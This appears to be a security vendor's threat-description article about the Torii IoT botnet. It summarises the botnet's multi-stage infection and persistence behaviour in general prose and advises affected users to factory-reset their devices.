Torii Botnet
The Torii Botnet is an Internet-of-Things-based network of Trojans that include comprehensive anti-analysis, persistence, and backdoor features, which the threat actor may exploit for dropping other threats, collecting information, or running threatening system commands. Variants of the Torii Botnet's components are compatible with a great range of devices and OS environments, which have been under attack since, at least, late 2017. Affected users should reset their IoT devices to factory conditions for removing the Torii Botnet and the associated security vulnerabilities immediately.
The Botnet that Starts from Tor and Goes Everywhere
Courtesy of independent Bulgarian security research, samples of a potentially ten-month-old botnet are coming under thorough investigation, with the threat actors responding, in turn, by improving their anti-analysis features. While the Torii Botnet, like Mirai, the Death Botnet, and Prowli, uses a decentralized means of committing crimes by infecting IoT devices opportunistically, its payload is unusual for both its sophistication and its apparent goals. The Torii Botnet, instead of running a simple Bitcoin-mining operation, creates broad, flexible backdoor security holes that its admins could use for various attacks.
Malware researchers are confirming the Torii Botnet's division into four general phases, regardless of the nature of the Internet-of-Things device in question:
- Attacks drop a corrupted script on the device after brute-forcing the login credentials (such as accounts using easy-to-guess strings like 'password1' or 'admin123'). This script, like the rest of the Torii Botnet's components, supports compatibility for an extensive range of environments and narrows down the system in question before dropping another threat via HTTP or FTP.
- The next stage is a Trojan dropper, more specialized than the first script, that also serves the purpose of downloading another Trojan: this time, a backdoor-capable one. It also handles making the backdoor Trojan system-persistent through not just one or two, but a total of six distinct methods, such as bashrc injection and System Daemon services.
- The backdoor Trojan, besides including some anti-analysis features that its authors are updating regularly, also transfers system information to an outside server, can use multiple means of downloading and running other files, and maintains a constant loop of contact with any Command & Control infrastructure. It can accept and run shell commands and cause substantial system changes, such as deleting files.
Malware experts' further inspections of the contents of some Torii Botnet servers also displays a possible modular component, 'sm_packed_agent.' This GO-based Trojan can run virtually any device-appropriate command and is compatible with an incredible range of environments, including personal computer-based ones, such as most versions of Windows and Linux. Its intended purpose alongside the other components requires additional investigation.
Keeping Your Devices Out of an Internet-of-Trojans
Most IoT-compromising campaigns make money by exploiting random devices' hardware for creating cryptocurrency or support other crimes by providing cover via simulations of network traffic, such as in a Distributed-Denial-of-Service attack. The Torii Botnet is very dissimilar to threats like Mirai in its apparent goals and shows numerous signs of programming experience and sophistication on the part of the threat actor, who is likely a single person that's responsible for most of the components of the Trojan network. Although the emphasis is on the risk to Internet-of-Things products, some parts of the Torii Botnet, such as its sm_packed_agent, could run on laptops, desktops or tablets with few or no modifications.
Different threats within the Torii Botnet possess compatibility with everything from MIPS architectures to PPC and SH, including 32-bit and 64-bit, and variable endianness. Its environmental requirements are flexible and its symptoms, other than potentially-flagged network traffic, are inconsequential to casual observers. Victims should consult their device manufacturer's recommendations for resetting the IoT device to factory standards and removing the Torii Botnet in the process. In the event of this threat's compromising a standard PC, most anti-malware products should intercept and delete the Torii Botnet's dropper during the early stages.
What, exactly, the Torii Botnet's author is after is still a question that many researchers in the cyber-security field must be asking themselves. However, with months of regular updates under the campaign's belt, it's clear that whatever it is, he must be getting it, thanks to the weak account security of his victims.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.